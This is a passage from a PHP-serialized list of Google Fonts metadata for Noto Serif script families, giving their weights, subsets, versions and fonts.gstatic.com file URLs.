Ethiopic\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";}s:7:\"subsets\";a:3:{i:0;s:8:\"ethiopic\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v18\";s:12:\"lastModified\";s:10:\"2022-08-16\";s:5:\"files\";O:8:\"stdClass\":9:{s:3:\"100\";s:131:\"http://fonts.gstatic.com/s/notoserifethiopic/v18/V8mjoR7-XjwJ8_Au3Ti5tXj5Rd83frpWLK4d-taxqWw2HMWjDxBAg5S_0QsrggxCzSQjkaO9UVLyiw.ttf\";s:3:\"200\";s:131:\"http://fonts.gstatic.com/s/notoserifethiopic/v18/V8mjoR7-XjwJ8_Au3Ti5tXj5Rd83frpWLK4d-taxqWw2HMWjDxBAg5S_0QsrggxCTSUjkaO9UVLyiw.ttf\";s:3:\"300\";s:131:\"http://fonts.gstatic.com/s/notoserifethiopic/v18/V8mjoR7-XjwJ8_Au3Ti5tXj5Rd83frpWLK4d-taxqWw2HMWjDxBAg5S_0QsrggxCkyUjkaO9UVLyiw.ttf\";s:7:\"regular\";s:131:\"http://fonts.gstatic.com/s/notoserifethiopic/v18/V8mjoR7-XjwJ8_Au3Ti5tXj5Rd83frpWLK4d-taxqWw2HMWjDxBAg5S_0QsrggxCzSUjkaO9UVLyiw.ttf\";s:3:\"500\";s:131:\"http://fonts.gstatic.com/s/notoserifethiopic/v18/V8mjoR7-XjwJ8_Au3Ti5tXj5Rd83frpWLK4d-taxqWw2HMWjDxBAg5S_0QsrggxC_yUjkaO9UVLyiw.ttf\";s:3:\"600\";s:131:\"http://fonts.gstatic.com/s/notoserifethiopic/v18/V8mjoR7-XjwJ8_Au3Ti5tXj5Rd83frpWLK4d-taxqWw2HMWjDxBAg5S_0QsrggxCEyIjkaO9UVLyiw.ttf\";s:3:\"700\";s:131:\"http://fonts.gstatic.com/s/notoserifethiopic/v18/V8mjoR7-XjwJ8_Au3Ti5tXj5Rd83frpWLK4d-taxqWw2HMWjDxBAg5S_0QsrggxCKiIjkaO9UVLyiw.ttf\";s:3:\"800\";s:131:\"http://fonts.gstatic.com/s/notoserifethiopic/v18/V8mjoR7-XjwJ8_Au3Ti5tXj5Rd83frpWLK4d-taxqWw2HMWjDxBAg5S_0QsrggxCTSIjkaO9UVLyiw.ttf\";s:3:\"900\";s:131:\"http://fonts.gstatic.com/s/notoserifethiopic/v18/V8mjoR7-XjwJ8_Au3Ti5tXj5Rd83frpWLK4d-taxqWw2HMWjDxBAg5S_0QsrggxCZCIjkaO9UVLyiw.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:985;O:8:\"stdClass\":8:{s:6:\"family\";s:19:\"Noto Serif Georgian\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";}s:7:\"subsets\";a:3:{i:0;s:8:\"georgian\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v18\";s:12:\"lastModified\";s:10:\"2022-08-16\";s:5:\"files\";O:8:\"stdClass\":9:{s:3:\"100\";s:131:\"http://fonts.gstatic.com/s/notoserifgeorgian/v18/VEMXRpd8s4nv8hG_qOzL7HOAw4nt0Sl_XxyaEduNMvi7T6Y4etRnmGhyLop-R3aSTvsfdzTw-FgZxQ.ttf\";s:3:\"200\";s:131:\"http://fonts.gstatic.com/s/notoserifgeorgian/v18/VEMXRpd8s4nv8hG_qOzL7HOAw4nt0Sl_XxyaEduNMvi7T6Y4etRnmGhyLop-R3aSzvofdzTw-FgZxQ.ttf\";s:3:\"300\";s:131:\"http://fonts.gstatic.com/s/notoserifgeorgian/v18/VEMXRpd8s4nv8hG_qOzL7HOAw4nt0Sl_XxyaEduNMvi7T6Y4etRnmGhyLop-R3aSEPofdzTw-FgZxQ.ttf\";s:7:\"regular\";s:131:\"http://fonts.gstatic.com/s/notoserifgeorgian/v18/VEMXRpd8s4nv8hG_qOzL7HOAw4nt0Sl_XxyaEduNMvi7T6Y4etRnmGhyLop-R3aSTvofdzTw-FgZxQ.ttf\";s:3:\"500\";s:131:\"http://fonts.gstatic.com/s/notoserifgeorgian/v18/VEMXRpd8s4nv8hG_qOzL7HOAw4nt0Sl_XxyaEduNMvi7T6Y4etRnmGhyLop-R3aSfPofdzTw-FgZxQ.ttf\";s:3:\"600\";s:131:\"http://fonts.gstatic.com/s/notoserifgeorgian/v18/VEMXRpd8s4nv8hG_qOzL7HOAw4nt0Sl_XxyaEduNMvi7T6Y4etRnmGhyLop-R3aSkP0fdzTw-FgZxQ.ttf\";s:3:\"700\";s:131:\"http://fonts.gstatic.com/s/notoserifgeorgian/v18/VEMXRpd8s4nv8hG_qOzL7HOAw4nt0Sl_XxyaEduNMvi7T6Y4etRnmGhyLop-R3aSqf0fdzTw-FgZxQ.ttf\";s:3:\"800\";s:131:\"http://fonts.gstatic.com/s/notoserifgeorgian/v18/VEMXRpd8s4nv8hG_qOzL7HOAw4nt0Sl_XxyaEduNMvi7T6Y4etRnmGhyLop-R3aSzv0fdzTw-FgZxQ.ttf\";s:3:\"900\";s:131:\"http://fonts.gstatic.com/s/notoserifgeorgian/v18/VEMXRpd8s4nv8hG_qOzL7HOAw4nt0Sl_XxyaEduNMvi7T6Y4etRnmGhyLop-R3aS5_0fdzTw-FgZxQ.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:986;O:8:\"stdClass\":8:{s:6:\"family\";s:18:\"Noto Serif Grantha\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:7:\"grantha\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:94:\"http://fonts.gstatic.com/s/notoserifgrantha/v15/qkBIXuEH5NzDDvc3fLDYxPk9-Wq3WLiqFENLR7fHGw.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:987;O:8:\"stdClass\":8:{s:6:\"family\";s:19:\"Noto Serif Gujarati\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";}s:7:\"subsets\";a:3:{i:0;s:8:\"gujarati\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v21\";s:12:\"lastModified\";s:10:\"2022-08-16\";s:5:\"files\";O:8:\"stdClass\":9:{s:3:\"100\";s:113:\"http://fonts.gstatic.com/s/notoserifgujarati/v21/hESa6WBlOixO-3OJ1FTmTsmqlBRUJBVkcgNLpdsspzP2HuYycYzuM1Kf-OJu.ttf\";s:3:\"200\";s:113:\"http://fonts.gstatic.com/s/notoserifgujarati/v21/hESa6WBlOixO-3OJ1FTmTsmqlBRUJBVkcgNLpdsspzP2HuaycIzuM1Kf-OJu.ttf\";s:3:\"300\";s:113:\"http://fonts.gstatic.com/s/notoserifgujarati/v21/hESa6WBlOixO-3OJ1FTmTsmqlBRUJBVkcgNLpdsspzP2HuZscIzuM1Kf-OJu.ttf\";s:7:\"regular\";s:113:\"http://fonts.gstatic.com/s/notoserifgujarati/v21/hESa6WBlOixO-3OJ1FTmTsmqlBRUJBVkcgNLpdsspzP2HuYycIzuM1Kf-OJu.ttf\";s:3:\"500\";s:113:\"http://fonts.gstatic.com/s/notoserifgujarati/v21/hESa6WBlOixO-3OJ1FTmTsmqlBRUJBVkcgNLpdsspzP2HuYAcIzuM1Kf-OJu.ttf\";s:3:\"600\";s:113:\"http://fonts.gstatic.com/s/notoserifgujarati/v21/hESa6WBlOixO-3OJ1FTmTsmqlBRUJBVkcgNLpdsspzP2Hubsd4zuM1Kf-OJu.ttf\";s:3:\"700\";s:113:\"http://fonts.gstatic.com/s/notoserifgujarati/v21/hESa6WBlOixO-3OJ1FTmTsmqlBRUJBVkcgNLpdsspzP2HubVd4zuM1Kf-OJu.ttf\";s:3:\"800\";s:113:\"http://fonts.gstatic.com/s/notoserifgujarati/v21/hESa6WBlOixO-3OJ1FTmTsmqlBRUJBVkcgNLpdsspzP2Huayd4zuM1Kf-OJu.ttf\";s:3:\"900\";s:113:\"http://fonts.gstatic.com/s/notoserifgujarati/v21/hESa6WBlOixO-3OJ1FTmTsmqlBRUJBVkcgNLpdsspzP2Huabd4zuM1Kf-OJu.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:988;O:8:\"stdClass\":8:{s:6:\"family\";s:19:\"Noto Serif Gurmukhi\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";}s:7:\"subsets\";a:3:{i:0;s:8:\"gurmukhi\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v14\";s:12:\"lastModified\";s:10:\"2022-08-09\";s:5:\"files\";O:8:\"stdClass\":9:{s:3:\"100\";s:113:\"http://fonts.gstatic.com/s/notoserifgurmukhi/v14/92z-tA9LNqsg7tCYlXdCV1VPnAEeDU0vLoYMbylXk0xTCr6-eBTNmqVU7y6l.ttf\";s:3:\"200\";s:113:\"http://fonts.gstatic.com/s/notoserifgurmukhi/v14/92z-tA9LNqsg7tCYlXdCV1VPnAEeDU0vLoYMbylXk0xTCr4-eRTNmqVU7y6l.ttf\";s:3:\"300\";s:113:\"http://fonts.gstatic.com/s/notoserifgurmukhi/v14/92z-tA9LNqsg7tCYlXdCV1VPnAEeDU0vLoYMbylXk0xTCr7geRTNmqVU7y6l.ttf\";s:7:\"regular\";s:113:\"http://fonts.gstatic.com/s/notoserifgurmukhi/v14/92z-tA9LNqsg7tCYlXdCV1VPnAEeDU0vLoYMbylXk0xTCr6-eRTNmqVU7y6l.ttf\";s:3:\"500\";s:113:\"http://fonts.gstatic.com/s/notoserifgurmukhi/v14/92z-tA9LNqsg7tCYlXdCV1VPnAEeDU0vLoYMbylXk0xTCr6MeRTNmqVU7y6l.ttf\";s:3:\"600\";s:113:\"http://fonts.gstatic.com/s/notoserifgurmukhi/v14/92z-tA9LNqsg7tCYlXdCV1VPnAEeDU0vLoYMbylXk0xTCr5gfhTNmqVU7y6l.ttf\";s:3:\"700\";s:113:\"http://fonts.gstatic.com/s/notoserifgurmukhi/v14/92z-tA9LNqsg7tCYlXdCV1VPnAEeDU0vLoYMbylXk0xTCr5ZfhTNmqVU7y6l.ttf\";s:3:\"800\";s:113:\"http://fonts.gstatic.com/s/notoserifgurmukhi/v14/92z-tA9LNqsg7tCYlXdCV1VPnAEeDU0vLoYMbylXk0xTCr4-fhTNmqVU7y6l.ttf\";s:3:\"900\";s:113:\"http://fonts.gstatic.com/s/notoserifgurmukhi/v14/92z-tA9LNqsg7tCYlXdCV1VPnAEeDU0vLoYMbylXk0xTCr4XfhTNmqVU7y6l.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:989;O:8:\"stdClass\":8:{s:6:\"family\";s:13:\"Noto Serif HK\";s:8:\"variants\";a:8:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:7:\"regular\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";}s:7:\"subsets\";a:5:{i:0;s:16:\"chinese-hongkong\";i:1;s:8:\"cyrillic\";i:2;s:5:\"latin\";i:3;s:9:\"latin-ext\";i:4;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v2\";s:12:\"lastModified\";s:10:\"2022-08-09\";s:5:\"files\";O:8:\"stdClass\":8:{s:3:\"200\";s:98:\"http://fonts.gstatic.com/s/notoserifhk/v2/BngdUXBETWXI6LwlBZGcqL-B_KuJFcgfwP_9RMf-K2RmV9Su1M6i.ttf\";s:3:\"300\";s:98:\"http://fonts.gstatic.com/s/notoserifhk/v2/BngdUXBETWXI6LwlBZGcqL-B_KuJFcgfwP_9RMcgK2RmV9Su1M6i.ttf\";s:7:\"regular\";s:98:\"http://fonts.gstatic.com/s/notoserifhk/v2/BngdUXBETWXI6LwlBZGcqL-B_KuJFcgfwP_9RMd-K2RmV9Su1M6i.ttf\";s:3:\"500\";s:98:\"http://fonts.gstatic.com/s/notoserifhk/v2/BngdUXBETWXI6LwlBZGcqL-B_KuJFcgfwP_9RMdMK2RmV9Su1M6i.ttf\";s:3:\"600\";s:98:\"http://fonts.gstatic.com/s/notoserifhk/v2/BngdUXBETWXI6LwlBZGcqL-B_KuJFcgfwP_9RMegLGRmV9Su1M6i.ttf\";s:3:\"700\";s:98:\"http://fonts.gstatic.com/s/notoserifhk/v2/BngdUXBETWXI6LwlBZGcqL-B_KuJFcgfwP_9RMeZLGRmV9Su1M6i.ttf\";s:3:\"800\";s:98:\"http://fonts.gstatic.com/s/notoserifhk/v2/BngdUXBETWXI6LwlBZGcqL-B_KuJFcgfwP_9RMf-LGRmV9Su1M6i.ttf\";s:3:\"900\";s:98:\"http://fonts.gstatic.com/s/notoserifhk/v2/BngdUXBETWXI6LwlBZGcqL-B_KuJFcgfwP_9RMfXLGRmV9Su1M6i.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:990;O:8:\"stdClass\":8:{s:6:\"family\";s:17:\"Noto Serif Hebrew\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";}s:7:\"subsets\";a:3:{i:0;s:6:\"hebrew\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v20\";s:12:\"lastModified\";s:10:\"2022-08-16\";s:5:\"files\";O:8:\"stdClass\":9:{s:3:\"100\";s:126:\"http://fonts.gstatic.com/s/notoserifhebrew/v20/k3k0o9MMPvpLmixYH7euCwmkS9DohjX1-kRyiqyBqIxnoLbp93i9IKrXKF_qVAwTAG8_vlQxz24.ttf\";s:3:\"200\";s:126:\"http://fonts.gstatic.com/s/notoserifhebrew/v20/k3k0o9MMPvpLmixYH7euCwmkS9DohjX1-kRyiqyBqIxnoLbp93i9IKrXKF_qVIwSAG8_vlQxz24.ttf\";s:3:\"300\";s:126:\"http://fonts.gstatic.com/s/notoserifhebrew/v20/k3k0o9MMPvpLmixYH7euCwmkS9DohjX1-kRyiqyBqIxnoLbp93i9IKrXKF_qVFISAG8_vlQxz24.ttf\";s:7:\"regular\";s:126:\"http://fonts.gstatic.com/s/notoserifhebrew/v20/k3k0o9MMPvpLmixYH7euCwmkS9DohjX1-kRyiqyBqIxnoLbp93i9IKrXKF_qVAwSAG8_vlQxz24.ttf\";s:3:\"500\";s:126:\"http://fonts.gstatic.com/s/notoserifhebrew/v20/k3k0o9MMPvpLmixYH7euCwmkS9DohjX1-kRyiqyBqIxnoLbp93i9IKrXKF_qVD4SAG8_vlQxz24.ttf\";s:3:\"600\";s:126:\"http://fonts.gstatic.com/s/notoserifhebrew/v20/k3k0o9MMPvpLmixYH7euCwmkS9DohjX1-kRyiqyBqIxnoLbp93i9IKrXKF_qVNIVAG8_vlQxz24.ttf\";s:3:\"700\";s:126:\"http://fonts.gstatic.com/s/notoserifhebrew/v20/k3k0o9MMPvpLmixYH7euCwmkS9DohjX1-kRyiqyBqIxnoLbp93i9IKrXKF_qVOsVAG8_vlQxz24.ttf\";s:3:\"800\";s:126:\"http://fonts.gstatic.com/s/notoserifhebrew/v20/k3k0o9MMPvpLmixYH7euCwmkS9DohjX1-kRyiqyBqIxnoLbp93i9IKrXKF_qVIwVAG8_vlQxz24.ttf\";s:3:\"900\";s:126:\"http://fonts.gstatic.com/s/notoserifhebrew/v20/k3k0o9MMPvpLmixYH7euCwmkS9DohjX1-kRyiqyBqIxnoLbp93i9IKrXKF_qVKUVAG8_vlQxz24.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:991;O:8:\"stdClass\":8:{s:6:\"family\";s:13:\"Noto Serif JP\";s:8:\"variants\";a:7:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:7:\"regular\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"900\";}s:7:\"subsets\";a:2:{i:0;s:8:\"japanese\";i:1;s:5:\"latin\";}s:7:\"version\";s:3:\"v21\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":7:{s:3:\"200\";s:86:\"http://fonts.gstatic.com/s/notoserifjp/v21/xn77YHs72GKoTvER4Gn3b5eMZBaPRkgfU8fEwb0.otf\";s:3:\"300\";s:86:\"http://fonts.gstatic.com/s/notoserifjp/v21/xn77YHs72GKoTvER4Gn3b5eMZHKMRkgfU8fEwb0.otf\";s:7:\"regular\";s:82:\"http://fonts.gstatic.com/s/notoserifjp/v21/xn7mYHs72GKoTvER4Gn3b5eMXNikYkY0T84.otf\";s:3:\"500\";s:86:\"http://fonts.gstatic.com/s/notoserifjp/v21/xn77YHs72GKoTvER4Gn3b5eMZCqNRkgfU8fEwb0.otf\";s:3:\"600\";s:86:\"http://fonts.gstatic.com/s/notoserifjp/v21/xn77YHs72GKoTvER4Gn3b5eMZAaKRkgfU8fEwb0.otf\";s:3:\"700\";s:86:\"http://fonts.gstatic.com/s/notoserifjp/v21/xn77YHs72GKoTvER4Gn3b5eMZGKLRkgfU8fEwb0.otf\";s:3:\"900\";s:86:\"http://fonts.gstatic.com/s/notoserifjp/v21/xn77YHs72GKoTvER4Gn3b5eMZFqJRkgfU8fEwb0.otf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:992;O:8:\"stdClass\":8:{s:6:\"family\";s:13:\"Noto Serif KR\";s:8:\"variants\";a:7:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:7:\"regular\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"900\";}s:7:\"subsets\";a:2:{i:0;s:6:\"korean\";i:1;s:5:\"latin\";}s:7:\"version\";s:3:\"v20\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":7:{s:3:\"200\";s:86:\"http://fonts.gstatic.com/s/notoserifkr/v20/3JnmSDn90Gmq2mr3blnHaTZXTihC8O1ZNH1ahck.otf\";s:3:\"300\";s:86:\"http://fonts.gstatic.com/s/notoserifkr/v20/3JnmSDn90Gmq2mr3blnHaTZXTkxB8O1ZNH1ahck.otf\";s:7:\"regular\";s:82:\"http://fonts.gstatic.com/s/notoserifkr/v20/3Jn7SDn90Gmq2mr3blnHaTZXduZp1ONyKHQ.otf\";s:3:\"500\";s:86:\"http://fonts.gstatic.com/s/notoserifkr/v20/3JnmSDn90Gmq2mr3blnHaTZXThRA8O1ZNH1ahck.otf\";s:3:\"600\";s:86:\"http://fonts.gstatic.com/s/notoserifkr/v20/3JnmSDn90Gmq2mr3blnHaTZXTjhH8O1ZNH1ahck.otf\";s:3:\"700\";s:86:\"http://fonts.gstatic.com/s/notoserifkr/v20/3JnmSDn90Gmq2mr3blnHaTZXTlxG8O1ZNH1ahck.otf\";s:3:\"900\";s:86:\"http://fonts.gstatic.com/s/notoserifkr/v20/3JnmSDn90Gmq2mr3blnHaTZXTmRE8O1ZNH1ahck.otf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:993;O:8:\"stdClass\":8:{s:6:\"family\";s:18:\"Noto Serif Kannada\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";}s:7:\"subsets\";a:3:{i:0;s:7:\"kannada\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v21\";s:12:\"lastModified\";s:10:\"2022-08-16\";s:5:\"files\";O:8:\"stdClass\":9:{s:3:\"100\";s:111:\"http://fonts.gstatic.com/s/notoserifkannada/v21/v6-8GZHLJFKIhClqUYqXDiWqpxQxWSPoW6bz-l4hGHiNgcYCceRJ71svgcI.ttf\";s:3:\"200\";s:111:\"http://fonts.gstatic.com/s/notoserifkannada/v21/v6-8GZHLJFKIhClqUYqXDiWqpxQxWSPoW6bz-l4hGHiNgUYDceRJ71svgcI.ttf\";s:3:\"300\";s:111:\"http://fonts.gstatic.com/s/notoserifkannada/v21/v6-8GZHLJFKIhClqUYqXDiWqpxQxWSPoW6bz-l4hGHiNgZgDceRJ71svgcI.ttf\";s:7:\"regular\";s:111:\"http://fonts.gstatic.com/s/notoserifkannada/v21/v6-8GZHLJFKIhClqUYqXDiWqpxQxWSPoW6bz-l4hGHiNgcYDceRJ71svgcI.ttf\";s:3:\"500\";s:111:\"http://fonts.gstatic.com/s/notoserifkannada/v21/v6-8GZHLJFKIhClqUYqXDiWqpxQxWSPoW6bz-l4hGHiNgfQDceRJ71svgcI.ttf\";s:3:\"600\";s:111:\"http://fonts.gstatic.com/s/notoserifkannada/v21/v6-8GZHLJFKIhClqUYqXDiWqpxQxWSPoW6bz-l4hGHiNgRgEceRJ71svgcI.ttf\";s:3:\"700\";s:111:\"http://fonts.gstatic.com/s/notoserifkannada/v21/v6-8GZHLJFKIhClqUYqXDiWqpxQxWSPoW6bz-l4hGHiNgSEEceRJ71svgcI.ttf\";s:3:\"800\";s:111:\"http://fonts.gstatic.com/s/notoserifkannada/v21/v6-8GZHLJFKIhClqUYqXDiWqpxQxWSPoW6bz-l4hGHiNgUYEceRJ71svgcI.ttf\";s:3:\"900\";s:111:\"http://fonts.gstatic.com/s/notoserifkannada/v21/v6-8GZHLJFKIhClqUYqXDiWqpxQxWSPoW6bz-l4hGHiNgW8EceRJ71svgcI.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:994;O:8:\"stdClass\":8:{s:6:\"family\";s:16:\"Noto Serif Khmer\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";}s:7:\"subsets\";a:3:{i:0;s:5:\"khmer\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v18\";s:12:\"lastModified\";s:10:\"2022-08-16\";s:5:\"files\";O:8:\"stdClass\":9:{s:3:\"100\";s:124:\"http://fonts.gstatic.com/s/notoserifkhmer/v18/-F6UfidqLzI2JPCkXAO2hmogq0146FxtbwKEr951z5s6lI40sDRH_AVhUKdN6B4wXEZK9Xo4xg.ttf\";s:3:\"200\";s:124:\"http://fonts.gstatic.com/s/notoserifkhmer/v18/-F6UfidqLzI2JPCkXAO2hmogq0146FxtbwKEr951z5s6lI40sDRH_AVhUKdNaB8wXEZK9Xo4xg.ttf\";s:3:\"300\";s:124:\"http://fonts.gstatic.com/s/notoserifkhmer/v18/-F6UfidqLzI2JPCkXAO2hmogq0146FxtbwKEr951z5s6lI40sDRH_AVhUKdNth8wXEZK9Xo4xg.ttf\";s:7:\"regular\";s:124:\"http://fonts.gstatic.com/s/notoserifkhmer/v18/-F6UfidqLzI2JPCkXAO2hmogq0146FxtbwKEr951z5s6lI40sDRH_AVhUKdN6B8wXEZK9Xo4xg.ttf\";s:3:\"500\";s:124:\"http://fonts.gstatic.com/s/notoserifkhmer/v18/-F6UfidqLzI2JPCkXAO2hmogq0146FxtbwKEr951z5s6lI40sDRH_AVhUKdN2h8wXEZK9Xo4xg.ttf\";s:3:\"600\";s:124:\"http://fonts.gstatic.com/s/notoserifkhmer/v18/-F6UfidqLzI2JPCkXAO2hmogq0146FxtbwKEr951z5s6lI40sDRH_AVhUKdNNhgwXEZK9Xo4xg.ttf\";s:3:\"700\";s:124:\"http://fonts.gstatic.com/s/notoserifkhmer/v18/-F6UfidqLzI2JPCkXAO2hmogq0146FxtbwKEr951z5s6lI40sDRH_AVhUKdNDxgwXEZK9Xo4xg.ttf\";s:3:\"800\";s:124:\"http://fonts.gstatic.com/s/notoserifkhmer/v18/-F6UfidqLzI2JPCkXAO2hmogq0146FxtbwKEr951z5s6lI40sDRH_AVhUKdNaBgwXEZK9Xo4xg.ttf\";s:3:\"900\";s:124:\"http://fonts.gstatic.com/s/notoserifkhmer/v18/-F6UfidqLzI2JPCkXAO2hmogq0146FxtbwKEr951z5s6lI40sDRH_AVhUKdNQRgwXEZK9Xo4xg.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:995;O:8:\"stdClass\":8:{s:6:\"family\";s:14:\"Noto Serif Lao\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";}s:7:\"subsets\";a:3:{i:0;s:3:\"lao\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v18\";s:12:\"lastModified\";s:10:\"2022-08-16\";s:5:\"files\";O:8:\"stdClass\":9:{s:3:\"100\";s:119:\"http://fonts.gstatic.com/s/notoseriflao/v18/3y9C6bYwcCjmsU8JEzCMxEwQfEBLk3f0rlSqCdaM_LlSNZ59oNw0BWH8VeMLrvOjlmyhHHQ.ttf\";s:3:\"200\";s:119:\"http://fonts.gstatic.com/s/notoseriflao/v18/3y9C6bYwcCjmsU8JEzCMxEwQfEBLk3f0rlSqCdaM_LlSNZ59oNw0BWH8VWMKrvOjlmyhHHQ.ttf\";s:3:\"300\";s:119:\"http://fonts.gstatic.com/s/notoseriflao/v18/3y9C6bYwcCjmsU8JEzCMxEwQfEBLk3f0rlSqCdaM_LlSNZ59oNw0BWH8Vb0KrvOjlmyhHHQ.ttf\";s:7:\"regular\";s:119:\"http://fonts.gstatic.com/s/notoseriflao/v18/3y9C6bYwcCjmsU8JEzCMxEwQfEBLk3f0rlSqCdaM_LlSNZ59oNw0BWH8VeMKrvOjlmyhHHQ.ttf\";s:3:\"500\";s:119:\"http://fonts.gstatic.com/s/notoseriflao/v18/3y9C6bYwcCjmsU8JEzCMxEwQfEBLk3f0rlSqCdaM_LlSNZ59oNw0BWH8VdEKrvOjlmyhHHQ.ttf\";s:3:\"600\";s:119:\"http://fonts.gstatic.com/s/notoseriflao/v18/3y9C6bYwcCjmsU8JEzCMxEwQfEBLk3f0rlSqCdaM_LlSNZ59oNw0BWH8VT0NrvOjlmyhHHQ.ttf\";s:3:\"700\";s:119:\"http://fonts.gstatic.com/s/notoseriflao/v18/3y9C6bYwcCjmsU8JEzCMxEwQfEBLk3f0rlSqCdaM_LlSNZ59oNw0BWH8VQQNrvOjlmyhHHQ.ttf\";s:3:\"800\";s:119:\"http://fonts.gstatic.com/s/notoseriflao/v18/3y9C6bYwcCjmsU8JEzCMxEwQfEBLk3f0rlSqCdaM_LlSNZ59oNw0BWH8VWMNrvOjlmyhHHQ.ttf\";s:3:\"900\";s:119:\"http://fonts.gstatic.com/s/notoseriflao/v18/3y9C6bYwcCjmsU8JEzCMxEwQfEBLk3f0rlSqCdaM_LlSNZ59oNw0BWH8VUoNrvOjlmyhHHQ.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:996;O:8:\"stdClass\":8:{s:6:\"family\";s:20:\"Noto Serif Malayalam\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:9:\"malayalam\";}s:7:\"version\";s:3:\"v20\";s:12:\"lastModified\";s:10:\"2022-08-16\";s:5:\"files\";O:8:\"stdClass\":9:{s:3:\"100\";s:116:\"http://fonts.gstatic.com/s/notoserifmalayalam/v20/JIAZUU5sdmdP_HMcVcZFcH7DeVBeGVgSMEk2cmVDq1ihUXL1t-1fnVwHpQVySg.ttf\";s:3:\"200\";s:116:\"http://fonts.gstatic.com/s/notoserifmalayalam/v20/JIAZUU5sdmdP_HMcVcZFcH7DeVBeGVgSMEk2cmVDq1ihUXL1N-xfnVwHpQVySg.ttf\";s:3:\"300\";s:116:\"http://fonts.gstatic.com/s/notoserifmalayalam/v20/JIAZUU5sdmdP_HMcVcZFcH7DeVBeGVgSMEk2cmVDq1ihU